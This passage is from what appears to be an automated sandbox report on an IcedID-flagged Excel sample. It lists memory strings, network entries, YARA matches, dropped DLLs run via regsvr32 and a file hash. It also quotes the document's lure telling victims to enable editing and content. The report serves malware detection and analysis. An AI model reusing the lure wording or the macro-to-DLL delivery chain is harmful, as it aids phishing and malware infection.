        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/?nc1=h_ls
        Source: regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/?nc2=h_lg
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ar/
        Source: regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ar/?nc1=h_ls
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/cn/
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/cn/?nc1=h_ls
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/de/
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/de/?nc1=h_ls
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/es/
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/es/?nc1=h_ls
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/fr/
        Source: regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/fr/?nc1=h_ls
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/id/
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/id/?nc1=h_ls
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/it/
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/it/?nc1=h_ls
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/jp/
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/jp/?nc1=h_ls
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ko/
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ko/?nc1=h_ls
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/marketplace/?nc2=h_mo
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/marketplace/?nc2=h_ql_mp
        Source: regsvr32.exe, 00000003.00000003.2098044591.0000000000347000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/nI
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/podcasts/aws-podcast/
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/privacy/?nc1=f_pr
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/pt/
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/pt/?nc1=h_ls
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ru/
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ru/?nc1=h_ls
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/search
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/search/
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/search/?searchQuery=
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/terms/?nc1=f_pr
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/th/
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/th/?nc1=f_ls
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/tr/
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/tr/?nc1=h_ls
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/tw/
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/tw/?nc1=h_ls
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/vi/
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/vi/?nc1=f_ls
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://awsmedia.s3.amazonaws.com
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://c0.b0.p.awsstatic.com
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://calculator.aws
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://chtbl.com
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/?nc2=h_m_mc
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/billing/home?nc2=h_m_bc
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/console/home
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/console/home?nc1=f_ct&amp;src=footer-signin-mobile
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/iam/home?nc2=h_m_sc#security_credential
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/support/home/?nc1=f_dr
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/support/home/?nc2=h_ql_cu
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/support/home?nc2=h_ql_cu
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://d1.awsstatic-china.com
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://d1.awsstatic.com
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://d1hemuljm71t2j.cloudfront.net
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://d1le29qyzha1u4.cloudfront.net
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://d1oqpvwii7b6rh.cloudfront.net
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://d1vo51ubqkiilx.cloudfront.net
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://d1yyh5dhdgifnx.cloudfront.net
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://d2908q01vomqb2.cloudfront.net
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://d2a6igt6jhaluh.cloudfront.net
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://d36cz9buwru1tt.cloudfront.net
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://d3ctxlq1ktw2nl.cloudfront.net
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://d3h2ozso0dirfl.cloudfront.net
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpString found in binary or memory: https://dc.ads.linkedin.com/collect/?pid=3038&amp;fmt=gif
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://devices.amazonaws.com?hp=tile&amp;so-exp=below
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://dgen8gghn3u86.cloudfront.net
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://dk261l6wntthl.cloudfront.net
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://docs.aws.amazon.com
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://docs.aws.amazon.com/index.html?nc2=h_ql_doc
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://download.stormacq.com/aws/podcast/
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://dpm.demdex.net
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://dts.podtrac.com
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://fls-na.amazon.com
        Source: regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpString found in binary or memory: https://fls-na.amazon.com/1/action-impressions/1/OE/aws-mktg/action/awsm_:comp_DeprecatedBrowser
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://googleads.g.doubleclick.net
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://i18n-string.us-west-2.prod.pricing.aws.a2z.com
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://img.youtube.com
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://marketingplatform.google.com
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://media.amazonwebservices.com
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://mktg-apac.s3-ap-southeast-1.amazonaws.com
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://p.adsymptotic.com
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://pages.awscloud.com
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpString found in binary or memory: https://pages.awscloud.com/communication-preferences?trk=homepage
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpString found in binary or memory: https://pages.awscloud.com/fico-case-study.html?hp=tile&amp;story=fico
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpString found in binary or memory: https://pages.awscloud.com/zillow-case-study?hp=tile&amp;story=zllw
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://phd.aws.amazon.com/?nc2=h_m_sc
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?exp=default
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?exp=default&amp;sc_icampaign=
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc1=f_ct&amp;src=default
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc2=h_ct&amp;src=default
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/manageYourAccount?nc2=h_m_ma
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpString found in binary or memory: https://press.aboutamazon.com/press-releases/aws
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://prod-us-west-2.csp-report.marketing.aws.dev/submit
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://prod-us-west-2.csp-report.marketing.aws.dev/submitx-amz-id-1Z10NXV9YPC16ZYC023HEX-Content-Ty
        Source: regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://s0.awsstatic.com
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://s0.awsstatic.com/en_US/nav/v3/panel-content/desktop/index.html
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://s0.awsstatic.com/en_US/nav/v3/panel-content/mobile/index.html
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://s3.amazonaws.com/aws-quickstart/
        Source: regsvr32.exe, 00000003.00000003.2098044591.0000000000347000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109698014.0000000000377000.00000004.00000020.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://ssl-static.libsyn.com
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://static-cdn.jtvnw.net
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://static.doubleclick.net
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/awscloud
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://website.spot.ec2.aws.a2z.com
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpString found in binary or memory: https://www.amazon.jobs/aws
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://www.buzzsprout.com;
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://www.gstatic.com;
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://www.honeycode.aws/?&amp;trk=el_a134p000003yC6YAAU&amp;trkCampaign=pac-edm-2020-honeycode-hom
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://www.linkedin.com
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpString found in binary or memory: https://www.twitch.tv/aws
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://www.youtube-nocookie.com;
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpString found in binary or memory: https://www.youtube.com/user/AmazonWebServices/Cloud/
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://yt3.ggpht.com;
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49174
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49172
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
        Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49174 -> 443

        E-Banking Fraud:

        barindex
        Yara detected IcedIDShow sources
        Source: Yara matchFile source: dump.pcap, type: PCAP
        Source: Yara matchFile source: 00000004.00000002.2109666116.000000000034E000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.2118665965.00000000002F7000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.2102390531.0000000000329000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.2109698014.0000000000377000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.2102412669.0000000000347000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.2120636157.0000000003090000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 2808, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 2996, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 3068, type: MEMORY

        System Summary:

        barindex
        Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
        Source: Document image extraction number: 0Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
        Source: Document image extraction number: 0Screenshot OCR: Enable Content button from the yellow bar above
        Source: Document image extraction number: 1Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
        Source: Document image extraction number: 1Screenshot OCR: Enable Content button from the yellow bar above
        Office process drops PE fileShow sources
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fmlJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XTOWN.dllJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\lsdfik[1].fmlJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XRAY.dllJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XZIBIT.dllJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\lsdfik[1].fmlJump to dropped file
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00221678 NtQuerySystemInformation,3_2_00221678
        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_001B1678 NtQuerySystemInformation,4_2_001B1678
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_002218103_2_00221810
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF8FB15D03_2_000007FEF8FB15D0
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF8FB41BF3_2_000007FEF8FB41BF
        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_001B18104_2_001B1810
        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000007FEF8F915D04_2_000007FEF8F915D0
        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000007FEF8F941BF4_2_000007FEF8F941BF
        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000007FEF77215D06_2_000007FEF77215D0
        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000007FEF77241BF6_2_000007FEF77241BF
        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\lsdfik[1].fml 2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
